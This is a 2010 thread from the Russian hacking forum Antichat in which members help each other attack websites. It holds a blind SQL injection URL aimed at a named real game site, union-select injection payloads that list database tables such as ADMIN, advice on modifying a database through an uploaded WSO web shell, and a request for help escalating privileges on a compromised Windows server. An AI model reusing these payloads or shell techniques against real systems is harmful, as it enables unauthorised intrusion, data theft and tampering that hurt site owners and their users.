HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13791  
Старый 13.06.2010, 00:46
z-kzn-z
Новичок
Регистрация: 17.04.2010
Сообщений: 15
С нами: 8457210

Репутация: 3
По умолчанию

Цитата:
Сообщение от v1d0qz  
Если ты хочешь скрыть линк, то скрывай как полагается. Лугл палит

Именно в этом запросе, что ты указал, крути как UPDATE;

http://hero2.eamobile.co.kr/myguild/myguild.asp?gid=474-1&lid=867&page=1

Сайт ватовый, нашел по быстрому блинд (с выводом нету время искать). Там действительно mysql. Но в теории под игру стоит ещё и mssql.

http://hero2.eamobile.co.kr/community.asp?cid=86488+and+substring(version(),1, 1)=5&page=1

зы. Jokester, теперь я опередил твою мысль. Правда я решил не цитировать Bb0y, вроде как парень старается, но видимо упустил мысль ТС, а ты я вижу никого не пожалел. Ну и ладно...
да если бы сильно хотел, скрыл бы)
спасибо, буду искать
 
Ответить с цитированием

  #13792  
Старый 13.06.2010, 00:53
DeluxeS
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
С нами: 8829763

Репутация: 131
По умолчанию

//Решено

Последний раз редактировалось DeluxeS; 13.06.2010 в 01:51..
 
Ответить с цитированием

  #13793  
Старый 13.06.2010, 00:57
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию

Цитата:
Сообщение от DeluxeS  
Имеем шелл WSO 2.3, подключился к БД MySQL...
Цель: изменить 1 поле , сменить несколько цифр....
http://gyazo.com/fd1f51d574487c7a1bc79e8f1b4f7422.png
Где начинается "Привет.." Это поле и надо изменить, как сделать с помощью данного шелла?
Спасибо.
http://dev.mysql.com/doc/refman/5.0/en/update.html

Все гениальное - просто.
 
Ответить с цитированием

  #13794  
Старый 13.06.2010, 01:31
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию

DeluxeS в WSO нет функции изменения, тебе нужен phpmyadmin или што то подобное...

ищи и качай Adminer - Compact MySQL management
хорошая штука!
 
Ответить с цитированием

  #13795  
Старый 13.06.2010, 01:44
DeluxeS
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
С нами: 8829763

Репутация: 131
По умолчанию

Цитата:
Сообщение от GOGA075  
DeluxeS в WSO нет функции изменения, тебе нужен phpmyadmin или што то подобное...

ищи и качай Adminer - Compact MySQL management
хорошая штука!
Большое спасибо, отличная вещь, ещё раз спасибо

Последний раз редактировалось DeluxeS; 13.06.2010 в 01:50..
 
Ответить с цитированием

  #13796  
Старый 13.06.2010, 10:09
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
С нами: 8408116

Репутация: 55
По умолчанию

Я сейчас задам тупой вопрос. Залил шелл на Windows NT 5.2. Но процесс повышения прав в Windows - тёмный лес для меня.

Кто может помочь - стукните в аську 3765431-четые-9
 
Ответить с цитированием

  #13797  
Старый 13.06.2010, 12:53
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Цитата:
Сообщение от Twoster  
Покажи плиз запрос, которым ты вывел данные.
Браузер вывел следующие таблицы:

www.site.com/abstract.php?abstract=-1531'+union+select+1,group_concat(0x0b,table_name) ,3,4,5,6,7,8,9,10,11,12+from+information_schema.ta bles+--+

ADMIN,
ALERT,
AUTHORS,
EDITORS,
IPS,
MYPICS,
ONLINE,
ORDERS,
PAGES,

Все таблицы в верхнем регистре.


При таком запросе ничего не выводится.

www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+ADMIN+--+

Вводим имя таблицы в нижний регистре, все выводится.

www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+admin+--+
 
Ответить с цитированием

  #13798  
Старый 13.06.2010, 15:44
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от FlaktW  
Браузер вывел следующие таблицы:

www.site.com/abstract.php?abstract=-1531'+union+select+1,group_concat(0x0b,table_name) ,3,4,5,6,7,8,9,10,11,12+from+information_schema.ta bles+--+

ADMIN,
ALERT,
AUTHORS,
EDITORS,
IPS,
MYPICS,
ONLINE,
ORDERS,
PAGES,

Все таблицы в верхнем регистре.


При таком запросе ничего не выводится.

www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+ADMIN+--+

Вводим имя таблицы в нижний регистре, все выводится.

www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+admin+--+
А ты недумал что например, в css стоит что все слова под определённым дивом определённого размера? (Т.е. в верхнем, что в нижнем текст одинаковый).
 
Ответить с цитированием

  #13799  
Старый 13.06.2010, 15:50
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от mailbrush  
PS: FlaktW, насколько я знаю, в MySQL регистр не важен.
Важен, зайди в phpmyadmin и набери:

select user from mysql.USER

и сразу станет понятно
 
Ответить с цитированием

  #13800  
Старый 13.06.2010, 16:04
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию

Цитата:
Сообщение от Pashkela  
Важен, зайди в phpmyadmin и набери:

select user from mysql.USER

и сразу станет понятно
зашел и все норм вывело

Вообще, чувствительность к регистру(при указании имени базы или таблицы) у мускула зависит от платформы. В большинстве случаев, в Linux регистр играет роль, в Windows и Mac OS напротив.

Последний раз редактировалось Iceangel_; 13.06.2010 в 16:11..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.